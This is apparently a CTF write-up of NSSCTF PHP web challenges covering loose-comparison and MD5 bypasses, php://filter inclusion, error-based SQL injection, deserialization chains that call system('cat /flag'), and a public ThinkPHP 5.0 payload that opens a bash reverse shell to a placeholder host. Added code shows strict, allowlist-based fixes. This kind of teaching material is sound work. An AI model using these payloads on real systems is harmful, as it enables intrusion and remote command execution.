funny_web
Visiting rea11y.php gives the source:
<?php
error_reporting(0);
header("Content-Type: text/html;charset=utf-8");
highlight_file(__FILE__);
include('flag.php');
if (isset($_GET['num'])) {
    $num = $_GET['num'];
    if ($num != '12345') {
        if (intval($num) == '12345') {
            echo $FLAG;
        }
    } else {
        echo "这为何相等又不相等";
    }
}
Passing ?num=12345a directly yields the flag.
奇妙的MD5
The response headers contain a hint; the login is bypassed with the special md5 string ffifdyop.
After that, an array bypass is enough: ?x[]=1&y[]=2
<?php
error_reporting(0);
include "flag.php";
highlight_file(__FILE__);
if ($_POST['wqh'] !== $_POST['dsy'] && md5($_POST['wqh']) === md5($_POST['dsy'])) {
    echo $FLAG;
}
where_am_i
We are given a picture and a hint that something is 11 digits, so we guess it is the phone number in the picture and run the image through Baidu image search.
Then search for the hotel's contact details.
Visiting ending.php gives the flag directly.
ez_ez_php
Source:
<?php
error_reporting(0);
if (isset($_GET['file'])) {
    if ( substr($_GET["file"], 0, 3) === "php" ) {
        echo "Nice!!!";
        include($_GET["file"]);
    } else {
        echo "Hacker!!";
    }
} else {
    highlight_file(__FILE__);
}
//flag.php
File inclusion via a php:// wrapper; nothing much to say.
webdog1__start
MD5 bypass: use a special payload that starts with 0e both before and after hashing, such as 0e215962017.
https://blog.csdn.net/CSDNiamcoming/article/details/108837347
Visiting start.php, the HTML comment hints at a bot, so visit robots.txt.
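The three checks in funny_web, 奇妙的MD5 and webdog1__start all fail for the same reason, PHP loose comparison. The following is an added illustration, not code from the writeup: each challenge check is shown next to a strict version, and for the inputs used on this page the loose variants return true while the strict ones return false.

```php
<?php
// Added defender-side illustration (not from the writeup) of the three loose
// comparisons on this page and what a strict check does with the same input.

// funny_web: "12345a" != '12345' is true, yet intval("12345a") == '12345' is
// also true, because intval() stops at the first non-digit and == between an
// int and a numeric string compares numerically.
function funny_web_loose(string $num): bool {
    return $num != '12345' && intval($num) == '12345';
}
function funny_web_strict(string $num): bool {
    return $num === '12345';   // exact string match, no juggling
}

// 奇妙的MD5: on PHP 7, md5() of an array returns null with a warning, so two
// different arrays give null === null; PHP 8 throws a TypeError instead.
function md5_array_loose($a, $b): bool {
    try {
        return $a !== $b && @md5($a) === @md5($b);
    } catch (TypeError $e) {
        return false;
    }
}
function md5_strict($a, $b): bool {
    if (!is_string($a) || !is_string($b)) {
        return false;          // reject arrays before hashing
    }
    return $a !== $b && hash_equals(md5($a), md5($b));
}

// webdog1__start: two hashes of the form "0e<digits>" are numeric strings
// equal to zero, so == treats them as equal; hash_equals() compares bytes.
function zero_e_loose(string $input, string $known_hash): bool {
    return md5($input) == $known_hash;
}
function zero_e_strict(string $input, string $known_hash): bool {
    return hash_equals($known_hash, md5($input));
}

var_dump(funny_web_loose("12345a"));
var_dump(funny_web_strict("12345a"));
var_dump(md5_array_loose([1], [2]));
var_dump(md5_strict([1], [2]));
// QNKCDZO and 240610708 are the 0e pair the ez_1zpop exploit on this page uses
var_dump(zero_e_loose("240610708", md5("QNKCDZO")));
var_dump(zero_e_strict("240610708", md5("QNKCDZO")));
```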
该死的套娃
Next comes a length-limited command execution with a keyword filter; very simple.
F1l1l1l1l1lag.php?get=echo%09`nl%09/fla*`;
Ez_upload
The MIME type is restricted to jpg and the file content filters <?; this can be bypassed with .htaccess combined with php:// wrapper encoding.
Then visit 1.jpg; the flag is right there in the environment variables. /flag has restricted permissions, so perhaps a privilege escalation was intended and the environment variable was simply left in by mistake.
numgame
Viewing the page source is blocked, so manually prepend view-source: to the URL.
Then in 1.js we find the next nesting clue: NsScTf.php
Source:
<?php
error_reporting(0);
//hint: what is the other request method that resembles GET?
include("flag.php");
class nss{
    static function ctf(){
        include("./hint2.php");
    }
}
if(isset($_GET['p'])){
    if (preg_match("/n|c/m",$_GET['p'], $matches))
        die("no");
    call_user_func($_GET['p']);
}else{
    highlight_file(__FILE__);
}
Next, call the class's static method in the ClassName::method form, and use the fact that PHP treats class and method names case-insensitively to bypass the keyword filter.
Finally we get the flag.
ez_ez_php(revenge)
<?php
error_reporting(0);
if (isset($_GET['file'])) {
    if ( substr($_GET["file"], 0, 3) === "php" ) {
        echo "Nice!!!";
        include($_GET["file"]);
    } else {
        echo "Hacker!!";
    }
} else {
    highlight_file(__FILE__);
}
//flag.php
file=php://filter/convert.base64-encode/resource=/flag
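Both ez_ez_php variants and numgame fail for the same reason: they validate a user-controlled string with a prefix test or a denylist and then hand it to include() or call_user_func(). The following is an added illustration, not code from the writeup, of each challenge check next to an allowlist version; safe_include() and safe_call() are names made up here, and $base_dir stands for whatever directory the pages live in.

```php
<?php
// Added defender-side illustration (not from the writeup): the prefix test in
// ez_ez_php / ez_ez_php(revenge) and the regex denylist in numgame, beside an
// allowlist version of each. safe_include() and safe_call() are made-up names.

// ez_ez_php accepts anything starting with "php", which includes the
// php://filter wrapper that include() then opens.
function challenge_include_check(string $file): bool {
    return substr($file, 0, 3) === "php";
}

// Allowlist: a key selects a fixed file, and realpath() confirms the resolved
// path is still inside $base_dir. Everything else is rejected.
function safe_include(string $key, string $base_dir): ?string {
    $pages = ['home' => 'home.php', 'about' => 'about.php'];
    if (!array_key_exists($key, $pages)) {
        return null;
    }
    $base = realpath($base_dir);
    $real = realpath($base_dir . DIRECTORY_SEPARATOR . $pages[$key]);
    if ($base === false || $real === false || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;   // the caller does include($real)
}

// numgame blocks lowercase 'n' and 'c' only; PHP resolves class and function
// names case-insensitively, so "NSS::CTF" passes the regex and still runs.
function challenge_callable_check(string $p): bool {
    return !preg_match("/n|c/m", $p);
}

// Allowlist: normalise case first, then require an exact match.
function safe_call(string $p) {
    $allowed = ['nss::ctf'];
    $norm = strtolower($p);
    if (!in_array($norm, $allowed, true) || !is_callable($norm)) {
        return null;
    }
    return call_user_func($norm);
}

var_dump(challenge_include_check("php://filter/convert.base64-encode/resource=flag.php"));
var_dump(safe_include("php://filter/convert.base64-encode/resource=flag.php", __DIR__));
var_dump(challenge_callable_check("NSS::CTF"));
// phpinfo is callable but not in the allowlist, so safe_call() rejects it
var_dump(safe_call("phpinfo"));
```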
ez_rce
robots.txt gives the hint /NSS/index.php.
It turns out to be ThinkPHP 5.0, so we take a public payload from the internet.
NSS/index.php?s=captcha
_method=__construct&filter[]=system&method=get&get[]=bash -c "bash -i >%26 /dev/tcp/xxx/2333 0>%261"
Privilege escalation seemed necessary, but no SUID binaries were found and there was nothing in env either.
The flag is under /nss/ctf/flag/flag.
ez_sql
Parameters are passed via POST; error-based injection. The flag is in the Secr3t column of the NSS_tb table.
nss=1'/**/%26%26/**/updatexml(1,concat(0x7e,(select/**/substr(group_concat(Secr3t),30,20)/**/from/**/NSS_tb),0x7e),1)%23
Database: NSS_db
Tables: NSS_tb, users
Columns of NSS_tb: id, Secr3t, flll444g
Columns of users: id, username, password, USER, CURRENT_CONNECTION, TOTAL_CONNECTIONS
NSSCTF{c5c9aeda-560a-425b-ae7a-eaef3e4561bb}
ez_1zpop
Source:
<?php
error_reporting(0);
class dxg
{
    function fmm()
    {
        return "nonono";
    }
}
class lt
{
    public $impo='hi';
    public $md51='weclome';
    public $md52='to NSS';
    function __construct()
    {
        $this->impo = new dxg;
    }
    function __wakeup()
    {
        $this->impo = new dxg;
        return $this->impo->fmm();
    }
    function __toString()
    {
        if (isset($this->impo) && md5($this->md51) == md5($this->md52) && $this->md51 != $this->md52)
            return $this->impo->fmm();
    }
    function __destruct()
    {
        echo $this;
    }
}
class fin
{
    public $a;
    public $url = 'https://www.ctfer.vip';
    public $title;
    function fmm()
    {
        $b = $this->a;
        $b($this->title);
    }
}
if (isset($_GET['NSS'])) {
    $Data = unserialize($_GET['NSS']);
} else {
    highlight_file(__file__);
}
A very standard deserialization chain: change lt:3 to lt:4 to bypass __wakeup and get RCE.
<?php
class lt
{
    public $impo;
    public $md51='QNKCDZO';
    public $md52='240610708';
}
class fin
{
    public $a='system';
    public $title='cat /flag';
}
$l = new lt();
$fin = new fin();
$l->impo=$fin;
echo serialize($l);
1z_unserialize
Source:
<?php
class lyh{
    public $url = 'NSSCTF.com';
    public $lt;
    public $lly;
    function __destruct()
    {
        $a = $this->lt;
        $a($this->lly);
    }
}
unserialize($_POST['nss']);
highlight_file(__FILE__);
?>
<?php
class lyh{
    public $url;
    public $lt='system';
    public $lly='cat /flag';
    function __destruct()
    {
        $a = $this->lt;
        $a($this->lly);
    }
}
echo serialize(new lyh);
xff
GET / HTTP/1.1
Host: 1.14.71.254:28053
User-Agent: Xiaohong
Referer: Home Page
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
X-Forwarded-For: 127.0.0.1
Upgrade-Insecure-Requests: 1
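The request above sets X-Forwarded-For: 127.0.0.1 itself, so any check that reads that header as the client address sees localhost. The following is an added defender-side illustration, not code from the writeup: client_ip() is a made-up name, and $trusted_proxies is an assumed list that would hold the real reverse-proxy addresses.

```php
<?php
// Added defender-side illustration (not from the writeup): resolving the client
// address without trusting a client-supplied X-Forwarded-For header.
// client_ip() is a made-up name; $trusted_proxies is an assumed list.

function client_ip(array $server, array $trusted_proxies): string {
    $remote = $server['REMOTE_ADDR'] ?? '';
    // If the peer is not one of our proxies, the header came from the client
    // itself (as in the xff request above) and is ignored entirely.
    if (!in_array($remote, $trusted_proxies, true)) {
        return $remote;
    }
    $chain = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR'] ?? ''));
    // Walk from the right: each trusted proxy appends its own peer, so the first
    // address from the right that is not a trusted proxy is the real client.
    // Anything further left was supplied by the client and is not trusted.
    for ($i = count($chain) - 1; $i >= 0; $i--) {
        $ip = $chain[$i];
        if ($ip !== '' && !in_array($ip, $trusted_proxies, true)
            && filter_var($ip, FILTER_VALIDATE_IP) !== false) {
            return $ip;
        }
    }
    return $remote;
}

// Constructed request environments (what PHP would see for the request above,
// sent directly and sent through an assumed proxy at 10.0.0.2).
$direct    = ['REMOTE_ADDR' => '203.0.113.9', 'HTTP_X_FORWARDED_FOR' => '127.0.0.1'];
$via_proxy = ['REMOTE_ADDR' => '10.0.0.2',
              'HTTP_X_FORWARDED_FOR' => '127.0.0.1, 203.0.113.9'];

// In both cases the spoofed 127.0.0.1 is discarded and 203.0.113.9 is returned,
// whereas reading $_SERVER['HTTP_X_FORWARDED_FOR'] directly would give 127.0.0.1.
var_dump(client_ip($direct, ['10.0.0.2']));
var_dump(client_ip($via_proxy, ['10.0.0.2']));
```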
js_sign
A web/misc challenge.
document.getElementsByTagName("button")[0].addEventListener("click", () => {
    flag = "33 43 43 13 44 21 54 34 45 21 24 33 14 21 31 11 22 12 54 44 11 35 13 34 14 15"
    if (btoa(flag.value) == 'dGFwY29kZQ==') {
        alert("you got hint!!!");
    } else {
        alert("fuck off !!");
    }
})
dGFwY29kZQ==
It decodes to tapcode; decode the flag as tap code.
Flag: NSSCTF{youfindflagbytapcode}
ez_ez_unserialize
Source:
<?php
class X
{
    public $x = __FILE__;
    function __construct($x)
    {
        $this->x = $x;
    }
    function __wakeup()
    {
        if ($this->x !== __FILE__) {
            $this->x = __FILE__;
        }
    }
    function __destruct()
    {
        highlight_file($this->x);
        //flag is in fllllllag.php
    }
}
if (isset($_REQUEST['x'])) {
    @unserialize($_REQUEST['x']);
} else {
    highlight_file(__FILE__);
}
exp
<?php
class X
{
    public $x = "fllllllag.php";
}
$a = serialize(new X());
echo $a;
?x=O:1:"X":3:{s:1:"x";s:13:"fllllllag.php";}
funny_php
http://1.14.71.254:28247/?num=9e9&str=NSSNSSCTFCTF
md5_1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&md5_2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
Power!
Source:
<?php
class FileViewer{
    public $black_list = "flag";
    public $local = "http://127.0.0.1/";
    public $path;
    public function __call($f,$a){
        $this->loadfile();
    }
    public function loadfile(){
        if(!is_array($this->path)){
            if(preg_match("/".$this->black_list."/i",$this->path)){
                $file = $this->curl($this->local."cheems.jpg");
            }else{
                $file = $this->curl($this->local.$this->path);
            }
        }else{
            $file = $this->curl($this->local."cheems.jpg");
        }
        echo '<img src="data:jpg;base64,'.base64_encode($file).'"/>';
    }
    public function curl($path){
        $url = $path;
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $url);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_HEADER, 0);
        $response = curl_exec($curl);
        curl_close($curl);
        return $response;
    }
    public function __wakeup(){
        $this->local = "http://127.0.0.1/";
    }
}
class Backdoor{
    public $a;
    public $b;
    public $superhacker = "hacker.jpg";
    public function goodman($i,$j){
        $i->$j = $this->superhacker;
    }
    public function __destruct(){
        $this->goodman($this->a,$this->b);
        $this->a->c();
    }
}
if(isset($_GET['source'])){
    highlight_file(__FILE__);
}else{
    if(isset($_GET['image_path'])){
        $path = $_GET['image_path']; //flag in /flag.php
        if(is_string($path)&&!preg_match("/http:|gopher:|glob:|php:/i",$path)){
            echo '<img src="data:jpg;base64,'.base64_encode(file_get_contents($path)).'"/>';
        }else{
            echo '<h2>Seriously??</h2><img src="data:jpg;base64,'.base64_encode(file_get_contents("cheems.jpg")).'"/>';
        }
    }else if(isset($_GET['path_info'])){
        $path_info = $_GET['path_info'];
        $FV = unserialize(base64_decode($path_info));
        $FV->loadfile();
    }else{
        $path = "vergil.jpg";
        echo '<h2>POWER!!</h2>
<img src="data:jpg;base64,'.base64_encode(file_get_contents($path)).'"/>';
    }
}
?>
Deserialization.
exp
<?php
class FileViewer
{
    public $black_list='1';
    public $local;
    public $path='';
}
class Backdoor
{
    public $a;
    public $b;
    public $superhacker;
}
$f = new FileViewer();
$b = new Backdoor();
$b->superhacker='http://127.0.0.1:65500?image_path=flag.php';
$b->b='local';
$b->a=$f;
$p = [$b,''];
$final = serialize($p);
// echo $final."<br>";
$final = str_replace('i:1;s:0:','i:0;s:0:',$final);
echo base64_encode($final);
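Every one of ez_1zpop, 1z_unserialize, ez_ez_unserialize and Power! starts from unserialize() being called on user input with no class restriction, so the attacker picks which class (and therefore which __wakeup/__destruct/__toString) runs; the lt:3 to lt:4 trick additionally relies on a bug in older PHP releases that skipped __wakeup when the property count did not match. The following is an added defender-side illustration, not code from the writeup: the 1z_unserialize class with a harmless callable in place of system(), loaded with and without the allowed_classes option.

```php
<?php
// Added defender-side illustration (not from the writeup): the 1z_unserialize
// payload shape fed to unserialize() with and without allowed_classes.
// strtoupper stands in for the system / cat /flag pair used on this page.

class lyh {
    public $url = 'NSSCTF.com';
    public $lt;
    public $lly;
    function __destruct() {
        $a = $this->lt;
        if (is_callable($a)) {
            echo "__destruct ran: " . $a($this->lly) . "\n";
        }
    }
}

// Constructed payload: lt = 'strtoupper', lly = 'hello'.
$payload = 'O:3:"lyh":3:{s:3:"url";N;s:2:"lt";s:10:"strtoupper";s:3:"lly";s:5:"hello";}';

function unsafe_load(string $data) {
    // Any class in the string is instantiated, and its magic methods run.
    return unserialize($data);
}

function safe_load(string $data) {
    // allowed_classes => false turns every object into __PHP_Incomplete_Class,
    // whose __wakeup/__destruct/__toString are never invoked, so no gadget
    // chain can start regardless of property-count tricks.
    return unserialize($data, ['allowed_classes' => false]);
}

// Safe path: get_class() reports __PHP_Incomplete_Class, instanceof lyh is
// false, and nothing is echoed when the object is released.
$obj = safe_load($payload);
var_dump(get_class($obj), $obj instanceof lyh);
unset($obj);

// Unsafe path: a real lyh is built and its __destruct calls $lt($lly) on unset.
$obj = unsafe_load($payload);
var_dump(get_class($obj));
unset($obj);
```

Where the data never needs to carry objects at all, json_decode() avoids the problem entirely; allowed_classes is the fallback for code that must keep the PHP serialization format.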
file_master
Source:
<?php
session_start();
if(isset($_GET['filename'])){
    echo file_get_contents($_GET['filename']);
}
else if(isset($_FILES['file']['name'])){
    $whtie_list = array("image/jpeg");
    $filetype = $_FILES["file"]["type"];
    if(in_array($filetype,$whtie_list)){
        $img_info = @getimagesize($_FILES["file"]["tmp_name"]);
        if($img_info){
            if($img_info[0]<=20 && $img_info[1]<=20){
                if(!is_dir("upload/".session_id())){
                    mkdir("upload/".session_id());
                }
                $save_path = "upload/".session_id()."/".$_FILES["file"]["name"];
                move_uploaded_file($_FILES["file"]["tmp_name"],$save_path);
                $content = file_get_contents($save_path);
                if(preg_match("/php/i",$content)){
                    sleep(5);
                    @unlink($save_path);
                    die("hacker!!!");
                }else{
                    echo "upload success!! upload/your_sessionid/your_filename";
                }
            }else{
                die("image hight and width must less than 20");
            }
        }else{
            die("invalid file head");
        }
    }else{
        die("invalid file type!image/jpeg only!!");
    }
}else{
    echo '<img src="data:jpg;base64,'.base64_encode(file_get_contents("welcome.jpg")).'">';
}
?>
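The upload branch above trusts the client-supplied MIME type (the same weakness as in Ez_upload), keeps the client's filename, writes the file before grepping it, and then sleeps five seconds before unlinking, which leaves the original bytes on disk and reachable in the meantime. The following is an added defender-side rewrite of that branch, not the challenge code: handle_upload() is a made-up name and $dest_dir an assumed directory outside the web root.

```php
<?php
// Added defender-side rewrite (not the challenge code) of the file_master
// upload branch: content-based MIME detection, all checks before any write,
// a server-chosen name, and re-encoding through GD so none of the uploaded
// bytes (an embedded <?php or a .htaccess) are ever written to disk.
// handle_upload() is a made-up name; $dest_dir is an assumed private directory.

function handle_upload(array $file, string $dest_dir): array {
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return ['ok' => false, 'msg' => 'upload error'];
    }
    $tmp = $file['tmp_name'];
    if (!is_uploaded_file($tmp)) {
        return ['ok' => false, 'msg' => 'not an uploaded file'];
    }
    // Detect the type from the bytes, not from $_FILES['file']['type'].
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    if ($mime !== 'image/jpeg') {
        return ['ok' => false, 'msg' => 'image/jpeg only'];
    }
    $info = @getimagesize($tmp);
    if (!$info || $info[2] !== IMAGETYPE_JPEG || $info[0] > 20 || $info[1] > 20) {
        return ['ok' => false, 'msg' => 'invalid or oversized image'];
    }
    // Decode to pixels; a fresh JPEG is built from those pixels only.
    $img = @imagecreatefromjpeg($tmp);
    if ($img === false) {
        return ['ok' => false, 'msg' => 'invalid file head'];
    }
    if (!is_dir($dest_dir) && !mkdir($dest_dir, 0750, true)) {
        imagedestroy($img);
        return ['ok' => false, 'msg' => 'storage unavailable'];
    }
    // Name chosen by the server; the client filename is never used.
    $name = bin2hex(random_bytes(16)) . '.jpg';
    $path = rtrim($dest_dir, '/') . '/' . $name;
    $saved = imagejpeg($img, $path, 90);
    imagedestroy($img);
    if (!$saved) {
        return ['ok' => false, 'msg' => 'could not save'];
    }
    // No content grep and no sleep(): the original upload was never written.
    return ['ok' => true, 'name' => $name];
}

if (!empty($_FILES['file'])) {
    header('Content-Type: application/json');
    echo json_encode(handle_upload($_FILES['file'], __DIR__ . '/../uploads_private'));
}
```

The arbitrary-read branch (file_get_contents($_GET['filename'])) is a separate problem and is not addressed by this rewrite.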
1 comment
Impressive.